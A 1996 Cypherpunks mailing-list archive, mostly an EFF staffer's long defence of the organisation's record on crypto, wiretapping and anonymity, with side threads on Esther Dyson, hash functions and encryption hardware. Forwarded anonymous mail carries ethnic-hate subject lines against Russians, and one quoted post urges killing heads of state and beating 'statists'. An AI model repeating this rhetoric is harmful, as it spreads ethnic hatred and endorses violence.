typed: > > On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote: > > > > > ah, the quasi-yearly ranting on EFF has started up. what a great > > opportunity for drop-down-drag-dead flamewar. > > > > Black Unicorn: I resent your holier-than-thou moral posturing > > over EFF, and am going to attack it as representative of other > > criticism I have seen of EFF. > > I, unlike EFF, have never compromised my efforts to make strong crypto, > unescrowed strong crypto, and digitial communications, free from the FUD > spouted by government and media alike. I, unlike EFF, have never > compromised my efforts to resist the expansion of a wiretap state. I, > unlike EFF, have never proported to be a political represenative for these > positions and folded under the weakest of pressures like a reed. EFF has done none of that either. Compromise: 1. a settlement in which each side gives up some demands or makes concessions. 2. a) an adjustment of opposing principles, systems, etc., by modifying some aspects of each b) the result of such an adjustment. 3. something midway between two other things 4. a) exposure, as of one's reputation, to danger, suspicion, or disrepute b) a weakening, as of one's principles, ideals, etc.) as for reasons of expediency. 1 did not occur. EFF yielded nothing on any of the issues you mention. On Digital Telephony, which you clearly allude to, EFF opposed implementation of the wiretapping provisions of the CALEA bill from start to finish, and was instrumental in stripping most of them out, replacing them with new privacy protections. 2 did not occur. Our mission remains unedited from the day it was adopted, and EFF is just as committed to those principles now as ever. We don't have a system, in the relevant sense, as such. There was no such adjustment, ergo no result of one. 3 does not apply in any relevant sense (our steadfast assault against the CDA is a "compromise" under such a definition because it was neither a total victory, nor a total loss - yet I'm certain this is not the definition of "compromise" that you intend). 4a is not relevant (that's the security/secrecy-related definition, a nonsequitur in this context). 4b is simply a restatement of 2a - simply didn't happen. Our results speak for themselves on this. > > EFF is an organization that is professional and has > > worked toward improving cyberspace. it is easy for someone > > such as yourself to criticize such an organization anonymously, > > but what is the justification of your criticism? to me someone > > who has tried and failed, yet is still trying, is better than > > someone who has never tried. > > I would put forth that you know nothing of my efforts, and therefore are > in no position to judge me. I would also put forth that the efforts of > EFF, or lack thereof, are quite public. I would put forth that the public factors of EFF's efforts are quite public, but that you know nothing of the internal factors of those efforts, and ergo lack sufficient knowledge to make the allegations you make. > > what *constructive* > > alternative to EFF do you propose? if you have none, please shut up. > > I think any organization that would apply political pressure rather than > bow to it would be an alternative. I think an organization in touch I'm at a loss to think of any time in which EFF did otherwise. I don't think you have any concept whatsoever what a fight EFF put up over Digital Telephony. I would strongly advise a reading of the original version of the DT/CALEA bill, and the version that passed after EFF took an axe to it. You'll find a world of difference. You're welcome. We make no bones about the fact that the DT bill passing at all with wiretap provisions in it was a defeat. Defeats happen. Being defeated is not the same thing as bowing, as yielding the fight. > enough with its own policy to prevent its staff and board from making > embarassing big brother type proposals to curtail the ability of any of us > to post without attributation would be an alternative. I think an In other words you propose an alternate EFF that censors its own boardmembers. I'm not aware of any logical consistency that could adhere to an organization that simultaneously says it supports free speech, yet demands that its board of directors never speak except in agreement with the organization's policy. You are asking for a mini-dictatorship. EFF has no position on anonymity. We also have no position on abortion or on whether roast duck is better than fried chicken. You are in essence demanding that EFF impeach any boardmember that offers an opinion in public or in private about whether or not chicken is good stuff, or states a belief about right to choose v. right to life positions. I'm sorry that we are not totalitarian enough for you. Incidentally, Dyson made no such proposal as you refer to, but simply expressed questions and doubts about the misuse of anonymity, and made a clear and correct statement of fact ("you need to be able to get at somebody's identity to enforce accountability") without offering any value judgement about whether that was a good idea. She concluded that "the question is how do you also enforce freedom of speech and freedom from prosecution for unpopular opinions," clearly indicating at least as much doubt about the value of any attempt to force identifiability and accountability. Even Dyson's lead statement that "the damage that can be done by anonymity is far bigger" online that offline is factually correct, and does not consist of any kind of value judgement. It's simply an honest and, IMNERHO, necessary observation. If we lie to the public, or lie to ourselves, we lose, because the opposition will have arguements we have not even looked at much less wrestled with. I'm sorry we are not self-delusional and dishonest enough for you. > organization without the internal conflict and strife that has clearly > marred EFF in past and made it a laughable attempt at cohesive political > persuasion would be an alternative. I have news for you: We are human. Incidentally, two points: 1) "cohesive political persuasion" is not the be-all and end-all of civil liberties work, just a part of it; and 2) the political cohesion you want to see is very hard to accomplish, because civil libertarians are loath to march in lockstep. Compare the Christian Coalition and their allies - authoritarians all. It is no surprise, on a moment's consideration, that their spot on the politics-of-rights-and-authority axis has everything to do with their ability to suspend disbelief, to embrace blind faith, and to act in unison. BUT - a lot of progress is being made. EFF, ACLU, CDT, VTW, EPIC, et al., are all coordinating like never before, new global-scale civil liberties coalitions are forming, joint legal cases being filed, joint press releases and action alerts, being issued, conferences organized together, etc. What you are looking for is evolving as we type. > I think an organization that had > official policies on the core issues which it proposes to influence would > be an alternative. EFF has that. We have not proposed to influence anonymity issues, and we do not have a policy on that issue. When we have a policy on it, we'll probably propose to influence it. > In short, an organization that had even one of the needed elements of > legislative influence. (Cohesive, directed, persistent, and > uncompromising). We have all of these elements, but we have a lot more to do than engage in legislative influence. You've all seen how well that worked. The process is very corrupt, so we have to use it sparingly, and only when nececessary. The bulk of our work has to be done in other areas like supporting technical development, fighting cases to the Supreme Court, direct grassroots action campaigns, public education, media exposure, etc. All of these things directly affect the Hill, but EFF is not solely a lobbying organization. Even CDT and other DC-based groups are not solely lobbying organizations. > > I am tired of people announcing loudly to the world, "well if EFF > > doesn't support [insert my personal jihad here], then they're > > a bunch of losers who don't deserve anyone's money". > > Now who's holier-than-thou? What is so shocking about announcing that a > given organization does not support my interests and therefore calling on > others who share my interests not to make financial donations to said > organization? What's shocking to me is that you'd state as fact "that a given organization does not support [your] interests" when you have no actual knowledge of whether that's true or not, just a vague perception based on clearly insufficient information, and misapprehensions of fact that are easily refutable. > Is there something EFF fears in free speech and political > consensus building? Perhaps if they had a straightforward policy.... Certainly not. And please note that the person you are responding to does not speak for EFF, so your question is a nonsequitur. [Some stuff skipped, since irrelevant.] > > get a clue. an organization does not have to officially espouse what > > its members espouse. > > No, but when an organization espouses nothing on a given subject key to > its mission, what does that say? What about when its members espouse That says that the board of that organization has yet to come to consensus on the issue. Happens all the time. Ask the ACLU - there are all kinds of issues that someone somewhere thinks is "key to its mission" that ACLU has not yet evolved a position on, and won't until they need to due to some event or impending event such as legislation or a court case. Personally I agree with you that this issue is key to our mission, and I hope that EFF has a position on it soon. But I'm not the chairman of the board, so I wait, and I speak my mind. I have no problem with you speaking your mind, or even being less willing to wait. But I have no respect for unfounded accusations and fingerpointing. I don't even have much respect for well-founded fingerpointing when it's not helpful. Cypherpunks are supposed to write code. This is a waste of time. > entirely different and even counter productive beliefs? I would hardly > trust Senator Burns on the board of the ACLU, or a George Pacific > exec on Sierra Club's board. What's different here? Neither are on our board. What's your point? > > what an organization espouses should be carefully > > crafted. if all members feel strongly about an issue, yet all also > > feel that it should not be part of the official plank, then that may be > > a wise decision to leave it out. what an organization does *not* do is as > > important as what it does do. EFF is learning, by trial and error and the > > hard way, to "choose battles wisely". > > I thought its point was to protect cyberspace? What battles are left > after Digital Telecom, Anonymous Communication, Strong Crypto and CDA? About a thousand. Probably more. > There aren't many battles to choose. What a laugh. Just an example: At least 12 US state have passed or are considering passing CDA-like state legislation. Even after we kick the CDA's unconstitutional butt, each one of those state bills, with one or two exceptions if we're lucky, will have to be individually dealt with all the way to the state supreme courts in all probability, and quite possibly to the US Supreme Court in some cases. None of these bills are direct clones of the CDA, and it's doubtful that a whole lot of the CDA ruling will apply to them, necessitating individual constitutionality challenges. Now think on how many other jurisdictions there are in the world, from the local to the multinational, and consider how many of them have or are in the process of getting their own CDA-alike. And this is before we even think about censorship of online "hate speech" or "dangerous information". This is just the anti-porn bills. AND, when all is said and done the majority of these jurisdictions, especially the US federal Congress, are very likely to come right back and try it all again, with slightly modified bills that attempt to get around previous rulings. This is complete aside from privacy issues which are even less clear-cut than free speech issues. If you think there are a handful of issues to wrestle with, you are very, very sadly mistaken. There's an ocean of them. > Let's seem some action. I must surmise you don't read much about us. > I can sit > on my hands all day long too, but I will hardly claim to be supporting > hunger prevention in Africa by "thinking very hard about the subject." > (Particularly not when I have accepted money to further that goal). http://www.eff.org/pub/Legal/Cases/SJG http://www.eff.org/pub/Legal/Cases/Phrack_Neidorf_Riggs http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ http://www.eff.org/pub/Legal/Cases/AABBS_Thomases_Memphis/ http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS http://www.eff.org/pub/Legal/Cases/Church_of_Scientology_cases http://www.eff.org/pub/Legal/Cases/Clipper_FOIA http://www.eff.org/pub/Legal/Cases/PGP_Zimmermann http://www.eff.org/pub/Legal/Cases/Gilmore_v_NSA http://www.eff.org/pub/Legal/Cases/Karn_Schneier_export http://www.eff.org/pub/Legal/Cases/Kerberos_export http://www.eff.org/pub/Censorship/Internet_censorship_bills http://www.eff.org/pub/Censorship/Rimm_CMU_Time http://www.eff.org/pub/Censorship/GII_NII http://www.eff.org/pub/Censorship/Hate-speech_discrimination http://www.eff.org/pub/Censorship/Online_services http://www.eff.org/pub/Censorship/Terrorism_militias http://www.eff.org/pub/Privacy http://www.eff.org/pub/Privacy/ITAR_export http://www.eff.org/pub/Privacy/Key_escrow http://www.eff.org/pub/Privacy/Crypto_bills_1996 http://www.eff.org/pub/Privacy/Digital_Telephony_FBI http://www.eff.org/pub/Privacy/Email_GII_NII http://www.eff.org/pub/Privacy/Terrorism_militias http://www.eff.org/pub/Privacy/Tools http://www.eff.org/pub/Activism/FOIA/ITAR_FOIA http://www.eff.org/pub/GII_NII http://www.eff.org/pub/GII_NII/Govt_docs http://www.eff.org/pub/GII_NII/ISDN http://www.eff.org/pub/GII_NII/NREN_NSFNET_NPN http://www.eff.org/pub/Net_info/EFF_Net_Guide http://www.eff.org/pub/Alerts/ http://www.eff.org/pub/Intellectual_property/NII_copyright_bill [EFF has a position on intprop in as much as the fair use rights of the public are involved, and we work with DFC on this issue.] http://www.eff.org/blueribbon.html http://www.eff.org/goldkey.html http://www.ipc.org/ipc http://www.crypto.com http://www.etrust.org and so forth and so on. That's just off the top of my head. [Note: If one of these URLs doesn't work for you, stick "/index.html" at the end of it and try again, and/or try www2.eff.org instead of www.eff.org.] > > I would love to see more info about EFF's new direction. but one > > can ask for such clarification without a rabid style such as your own. > > Are you one of those people who still believes you can get more flies with > honey...? Ever been to Washington, D.C.? What does DC have to do with clarification of EFF's "new direction"? EFF was not founded in DC, and is not based there now. CDT fissioned off to do the DC stuff. > > blah, blah, blah. why should EFF give the slightest damn what you think > > of them? > > Its fairly clear that they don't. That said, why should I not make that You are mistaken. Don't think for an instant I'd waste 5 seconds of staff time on you otherwise. I have 10x more to do than I have time to do it in. [rest deleted as irrelevant, since founded on mistaken assumption.] > > why do I see so much of this in cyberspace and on the cpunks list: > > gripes, gripes, gripes by people who have no record themselves of > > doing anything constructive...? the difficulty of doing something > > constructive is proven by the failures, it is not necessarily > > evidence of incompetence or conspiracies. perhaps you, Unicorn, > > feel the cpunks have a greater track record than EFF? > > I do infact feel the cpunks have a greater track record than EFF. Tell > me, what has EFF done? See URLs above. Consider it a suggested reading list. The list of "cypherpunk" accomplishments in terms > of making the net a better place to be is, in my view, significant. Indeed it is. I do not think it possible to quantify what EFF have done or what CPs have done, and then weigh the two against eachother. I have yet to see an accomplishometer. I also can't think of any point in doing so. This is not a contest. We are on the same side. > Certainly the discussion here is livelier than anything I've seen from > EFF. EFF is not a discussion forum (though we provide, in some sense, a pretty lively one at comp.org.eff.talk in Usenet. We also started alt.politics.datahighway, which sees some traffic, mostly about US govt "info superhighway" hype and b.s. Comp.org.eff.talk is more general, and tends to focus on civil liberties issues and cases.) > > >I would be most happy to be proven wrong and see EFF suddenly, in a burst > > >of impressive moral fiber, speak out publically and take some political > > >action to assure anonymous communication. > > > > I would like you to explain why you feel the need to criticize EFF > > for not necessarily sharing your own agenda. > > The same reason I feel free to criticize communism for not sharing my own > agenda. > > You reveal here the basic character of your objection. You don't like > the fact that I criticized EFF. It has nothing to do with the fact that > you think EFF has done wonderful and fantastic things (you point to none > in this post) but that you have some emotional fondness for them. This is > the trap. EFF _sounds_ good, and so its worth sticking up for. Well > what, EFF, have you done for us LATELY? Again, see above. See in particular: http://www.eff.org/pub/Censorship/Internet_censorship_bills - PA court rules CDA unconstitutional http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS - CA court rules software - both source and object code - protected expression under the First Amendment Both cases are headed for the Supreme Court. NB: I think your criticism is valid at least in the abstract. It is certainly fair to ask what we've done, not how we sound or feel. I think the refereces I've provided will answer that question adequately. > > >Well, let's have a clear official position issued then to end all dispute. > > > > again, you fail to grasp: EFF may justifiably not want to engage in that > > fight. it might be a wise decision. who are you to dictate EFF's > > agenda? why are you picking a fight with someone who might be the > > best ally? > > If EFF is the best ally then we need to seek others. They have done > nothing in my view to help keep strong crypto around, to secure a person's > right to speak without a citizen unit I.D. being attached, and to promote, > by extension, free speech. Then you know absolutely diddley about what we are doing. Beware lecturing about that of which you know little. If our legal cases win, we win all of the above concerns you just articulated. And both cases look very much like they will win hands down. And, these are hardly the only fronts we are working on. > Look, even you have gotten on my case here for > speaking without revealing my real name. You think something I said Notably I have not. Indeed, I mentioned to the board here that the fact that I've met you in person, signed your PGP key, had you and other DC CP's over to EFF's DC office for CP meetings, was a testament to anonymity/pseudonymity - I didn't need to know the name the government calls you buy, just needed to see enough evidence that you as a body are attached to Black Unicorn as a nym, and to have an idea of the reputation of the nym. [non-relevant (to me) comments skipped.] > > > Of > > >course you should expect people to wonder about EFF when you have no > > > official position and yet some staff and board members seem to have a > > >statist bent. > > > > and you, like many other cypherpunks and cyberspace weasels, > > have a whine-and-shriek-from-the-shadows bent. > > And your point is? > > You'd like the shadows lifted? Speaking without a true name attached is > somehow evil? I tend to suspect the criticism had more to do with "all talk and no action" and other such concerns. Just my interpretation. > Why not make some solid arguments for why TCM is wrong then? Certainly it > appears he is on the mark to me. The main flaw in this reasoning (which I'm not sure at all is actually Tim's reasoning, but appears to be the reasoning here) is that these efforts are not contradictory, but complementary. As a practical matter, the entire question is meaningless since neither effort can be measured, and there is no point in doing so in the first place, since no issue of whether or not the CPs or the EFF is 'better' has arisen, and no such issue makes sense. > > I also don't understand the anonymity fight by cpunks. it's the > > wrong battle imho. ask any remailer operators how their services > > are panning out. they will complain of the incessant spam and > > increasing litigious pressure. I don't see any technological > > solutions to these problems. if there were, they'd have been > > invented now. > > This is EFF talking. "The situation is hopeless, bail now to preserve > image." Uh, no, that was someone talking, who has an individual opinion on the subject. One that I don't share and that I don't think anyone else shares at EFF either. In particular, the litigatory pressures are likely to be groundless, at least in US law. There is a hell of a lot of caselaw supporting the rights to anonymous and pseudonymous speech and publication. As for the spam problem, that can be rather trivially fixed with filters (or reduced, at least. Clever people will always find a way to break or abuse any given system.) EFF has never "bailed" from any issue to preserve image. If we'd been concerned with image, we would not have taken the tactic we did with DigTel - a tactic that worked incompletely but better than shouting "boo" from the sidelines, but a tactic which harmed our image very much. Such is the price we pay. Our mission is not "to look cool to the public", much less to Cypherpunks, our mission is to protect the public interest and individual liberty. > Explain to me how reputation systems work in the absence of anonymity. > Explain to me when freedom has been anything but "a pain in the ass." I have to agree wholeheartedly. > Weakness is all you have to offer. Offer it to EFF. No thanks, we have no use for it. We also have no use for pointless ankle-biting. Please, go write some code. That's what you guys are best at, and it's why you're here ("here" = cypherpunks). If you are in need of a project, how about an anon remailer that runs on Windows 3.x, NT, and 95, and another for Mac? There are what, maybe 20 operational chained remailers right now? That's not going to cut it. There need to be more. (This is MY PERSONAL opinion, not an EFF statement of policy. For the time being anyway. :) PS: No hard feelings are held here, on my part, and I intend to convey none, even if I do argue forcefully. I am not your enemy. Consider this a workout, some mental sparring to get the blood flowing. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From jonl at well.com Tue Sep 3 17:21:00 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 08:21:00 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960903152037.58cfc590@mail.well.com> At 12:04 PM 9/3/96 -0700, Stanton McCandlish wrote: >> I, unlike EFF, have never compromised my efforts to make strong crypto, >> unescrowed strong crypto, and digitial communications, free from the FUD >> spouted by government and media alike. I, unlike EFF, have never >> compromised my efforts to resist the expansion of a wiretap state. I, >> unlike EFF, have never proported to be a political represenative for these >> positions and folded under the weakest of pressures like a reed. > >EFF has done none of that either. > >Compromise: 1. a settlement in which each side gives up some demands or >makes concessions. 2. a) an adjustment of opposing principles, systems, >etc., by modifying some aspects of each b) the result of such an >adjustment. 3. something midway between two other things 4. a) exposure, >as of one's reputation, to danger, suspicion, or disrepute b) a >weakening, as of one's principles, ideals, etc.) as for reasons of >expediency. > >1 did not occur. EFF yielded nothing on any of the issues you mention. >On Digital Telephony, which you clearly allude to, EFF opposed >implementation of the wiretapping provisions of the CALEA bill from start >to finish, and was instrumental in stripping most of them out, replacing >them with new privacy protections. 2 did not occur. Our mission remains >unedited from the day it was adopted, and EFF is just as committed to those >principles now as ever. We don't have a system, in the relevant sense, >as such. There was no such adjustment, ergo no result of one. 3 does >not apply in any relevant sense (our steadfast assault against the CDA is >a "compromise" under such a definition because it was neither a total >victory, nor a total loss - yet I'm certain this is not the definition of >"compromise" that you intend). 4a is not relevant (that's the >security/secrecy-related definition, a nonsequitur in this context). 4b >is simply a restatement of 2a - simply didn't happen. Our results speak >for themselves on this. Compromise is not necessarily a bad thing; without some give and take, we sorta run right over each other. OTOH, I do agree that a strong position is necessary at this juncture. -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From talon57 at well.com Tue Sep 3 17:27:39 1996 From: talon57 at well.com (Brian D Williams) Date: Wed, 4 Sep 1996 08:27:39 +0800 Subject: The Vincennes shootdown Message-ID: <199609032039.NAA13681@well.com> FACT #1 The U.S.S. Vincennes was under attack by gunboats of Iraq's Republican guard at the time of the unfortunate incident. (All bets are off) FACT #2 Intelligence believed the Republicican guard had it's own version of the "Kamikazi." Fact #3 If I was still a sneaky-ass airwarrior given the mission to take out a vastly superior vehicle like an Aegis class cruiser I would do one of the following: a) set my transponder to the I.D. of a commercial jet, and do my best to fly like it's profile. b) turn my transponder off and "ride tail" (stay directly under and behind the commercial jet, hiding in it's radar sig) till I was within range. Brian From dlv at bwalk.dm.com Tue Sep 3 17:36:06 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:36:06 +0800 Subject: Forwarded Mail In-Reply-To: <199609031658.SAA01776@basement.replay.com> Message-ID: >From nobody at REPLAY.COM Tue Sep 3 12:58:21 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Tue, 03 Sep 96 13:17:51 EDT for dlv Received: from [194.109.9.44] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA23053 for dlv at bwalk.dm.com; Tue, 3 Sep 96 12:58:21 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA01776 for dlv at bwalk.dm.com; Tue, 3 Sep 1996 18:58:19 +0200 (MET DST) Date: Tue, 3 Sep 1996 18:58:19 +0200 (MET DST) Message-Id: <199609031658.SAA01776 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: KILL ALL RUSSIAN IMIGRANTS Return-Path: To: cypherpunks at toad.com Subject: Kill all "libertarians" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 02 Sep 96 15:48:31 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From adam at homeport.org Tue Sep 3 18:10:01 1996 From: adam at homeport.org (Adam Shostack) Date: Wed, 4 Sep 1996 09:10:01 +0800 Subject: [Noise] Hardware encryption devices? Message-ID: <199609032223.RAA03063@homeport.org> Anyone used any LAN encryption devices (ethernet or fast ethernet speed?) Something that could do IP AH off the back of an Ultrasparc would be ideal. Proprietary packet formats are ok, if they tunnel in IP. Needs to use DES, IDEA, or some other well known cipher. Manual key exchange is ok for this app. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Tue Sep 3 18:14:49 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 09:14:49 +0800 Subject: The Esther Dyson Flap Message-ID: At 8:40 PM 9/3/96, Duncan Frissell wrote: >Everyone please take a deep breath. Slow down. Reread Esther's comments. >Count to 10. Notice that nowhere does she call for state action to outlaw >anonymity. She explicitly predicted a place for anonymity in her CFP'95 >talk (is it on the Net anywhere?). We may disagree with her predictions of >the future scope of anonymity or with her concerns about the risks of the >practice but she has never called for State action. She is discussing the >problems she perceives with it. That's all. I certainly read her words, and don't need to be told to reread them just because I take them to mean she supports anonymity less than many of us would like. As I said in my message to Chuck Thompson, I held off in criticizing her "L.A. Times" words until I could get a better clarification of what she said, precisely, what was taken out of context, and what she really meant to say. When she spoke up and the result was just as ambivalent about anonymity rights, this is when I wrote my first criticism of her views. And I saw her CFP '95 talk. I've also read various of her other comments on the Net, freedom, responsibility, and anonymity. Some of her comments: * "Esther Dyson, President EDventure Holdings, Inc. said her work with the Electronic Frontier Foundation was based on the assumptions that the Internet will have a beneficial effect on society. "The longer I have been at this, the more questions I have about these assumptions," she said." (Perhaps Esther is finding the goals of the EFF--or at least the views of the other board members--are not her goals.) * "The second way to create friction is to create accountability, identity and personality. "I would like to see a world where anonymity is not illegal, but is discouraged," Dyson said. "It has its place in life, but people should have persistent identities."" (Couple with other comments about possibly requiring traceability (albeit with some legal protections), it sure does sound like her form of "discouraged" would imply a role for government.) * "This raises the issue of privacy. "I am looking at a notion of privacy for the consumer, but less privacy for companies and public office holders and others in positions of responsibility," she said." (Is this the direction the EFF is being taken in? Granted, these are her comments, but surely the views of the Chairman of the EFF affect the personality and direction of the organization.) These quotes from: http://seicenter.wharton.upenn.edu/SEIcenter/panel3.html. By the way, the Scientologists have also noted her views: "Esther Dyson, member of the board of directors of the Electronic Frontier Foundation and member of the National Information Infrastructure Advisory Council, spoke on the anonymity issue at the fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. "I have a concern about the spread of bad behavior on the Net," said Dyson. "Anonymity figures into this, and I feel that it has proven to not be a positive factor. It breaks down the community which we are seeking to build, and could turn the 'big cities' of the information infrastructure into a big cesspool." "Remailers who facilitate anonymous postings are part of the problem. They can act as conduits for those who seek anonymity as a way to act illegally without getting caught; yet remailers are able to shield themselves from responsibility or liability. "Computer experts stress that anonymous users should at least be trackable by the remailers -- and that ones who act unlawfully can easily put the remailers at risk. Dyson noted that in self-regulatory schemes for almost any part of the Internet, "visibility, not anonymity, would have a strong place."" (end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm) >Remember she is from the soft left. She is not a macho-flash radical >libertarian like many of us. Save the 155 MM howitzers for the armed >opposition not for our allies. I don't know what "macho-flash" means, but I reject the label. And please spare us the "save the howitzers" comment. We talk about what concerns us. As it happens, our political opponents don't read our words, whereas a bunch of EFF board members apparently do, and so our criticisms here may cause EFF to actually confront the issue of anonymity and decide where they actually stand. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jamesd at echeque.com Tue Sep 3 18:24:24 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 09:24:24 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609032113.OAA06380@dns2.noc.best.net> At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: > EFF in generally does not issue extremist position > statements, but is careful to examine the risks as well as the benefits, > and look for pro-liberty solutions to those risks. If the right to speak anonymously is an "extremist" position in the eyes of the EFF, then they are no friends of liberty. It is hardly an "extremist" position outside of such countries as Cuba, Iran, or China. It is the overwhelmingly mainstream position, not just among netizens, but when last heard, amongst supreme court judges and ordinary people in the street. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From myth at nym.alias.net Tue Sep 3 19:04:31 1996 From: myth at nym.alias.net (Medea) Date: Wed, 4 Sep 1996 10:04:31 +0800 Subject: [NOISE] The Doors Message-ID: <199609032152.RAA26814@anon.lcs.mit.edu> Vipul wrote: > >The Doors was not only about freedom and love, but about crypto too! >Notice these lines from the song "Five to One" > >Old [cipher] gets old and young get stronger >May take a week baby, may take longer [to crack] >they've [clinton] got the guns and we've got the numbers >gonna win we will take 'em over, com'on. What?! I think you need to stop ingesting those controlled substances.... Medea ======================================== I wonder whatever happened to Jason.... From markm at voicenet.com Tue Sep 3 19:26:15 1996 From: markm at voicenet.com (Mark M.) Date: Wed, 4 Sep 1996 10:26:15 +0800 Subject: Message Digest In-Reply-To: <01BB9989.81517870@dial15.pcnet.ro> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 3 Sep 1996, Costin RAIU wrote: > I'm interested in a 256 bits (or more) message digest algorithm > (C source is better). Any URLs ? Try HAVAL. It is a variable one-way hash function that is apparently secure against collisions. It should be on any of the standard crypto FTP sites. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMixPHCzIPc7jvyFpAQHzvQf/ehXClQ/hfTRYCe7bQZh03vZWQOJqbvOo iwteOol5yJMpkwFy/ytj86cUm/ge1b7ASGE14U79MHaEucEV17OspHGMYl61l+IY U05rcajORmGqO1WvwU50tvU9viqFO/F6OiFu+BSd4mKIHL1iyLlw3+X7RtMeD5Ol y9XZVNV4ErUh8RTFU1bMj7I04YWFGt0jk78ona5RMjbNdqYX9r59h3recN/3M6TI wZ5lS4aaR0nrUY8B1mI3ZPKqvEcJrqjEAq4eb8iVqX1/GkJoj3PR155ABsRhtKea ZoE7Giz/9BYOaADBL2wp/m+E7QtnbGizKrOy2cFVi1sd1N4PAAl3mQ== =aqHU -----END PGP SIGNATURE----- From jquinby at fivepaces.com Tue Sep 3 19:34:26 1996 From: jquinby at fivepaces.com (Jay Quinby) Date: Wed, 4 Sep 1996 10:34:26 +0800 Subject: [NOISE] The Doors Message-ID: <2.2.32.19960903214956.007154d4@mailhost> At 07:36 PM 9/3/96 +0000, you wrote: > >The Doors was not only about freedom and love, but about crypto too! >Notice these lines from the song "Five to One" > >Old [cipher] gets old and young get stronger >May take a week baby, may take longer [to crack] Actually, I think the line reads "They take our week, and make it longer." (There's a line a little later that goes "Trading your hours for a handful of dimes.") >they've [clinton] got the guns and we've got the numbers >gonna win we will take 'em over, com'on. Slightly left of topic, but it is a great song! :) Someone ought to compile a "Best of Crypto-references in pop culture" file. |--------------------------------------------------------------------------| |James R. Quinby, Atlanta, GA | PADI/153KHz-999MHz/HTML/EADBGE/Phl4:8-13 | |jquinby at fivepaces.com (work) | Own a 45 MPH couch potato: Adopt a | |jquinby at bellsouth.net (home) | greyhound today. Write for details. | |--------------------------------------------------------------------------| |Standard disclaimer: Opinions expressed are mine alone, not my employers. | |PGP Public Key fingerprint: 9ACC4C28478018E1372DC06A9452A477/MIT Keyserver| |--------------------------------------------------------------------------| From qut at netcom.com Tue Sep 3 19:41:04 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 10:41:04 +0800 Subject: Voting Monarchist? In-Reply-To: Message-ID: <199609032341.QAA24172@netcom.netcom.com> ! > > Vote Monarchist ! > ! > who is the candidate? LaRouche? ! ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running ! for president. Anyone who doesn't advocate killing all kings, presidents, ! and prime ministers is a fucking statist and should be beaten to a pulp ! with a rattan stick. That's the problem with the Libertarians, they've got some sort of hang up about beatings. Must be some childhood difficulties. From jonl at well.com Tue Sep 3 19:50:49 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 10:50:49 +0800 Subject: What is the EFF doing exactly? Message-ID: 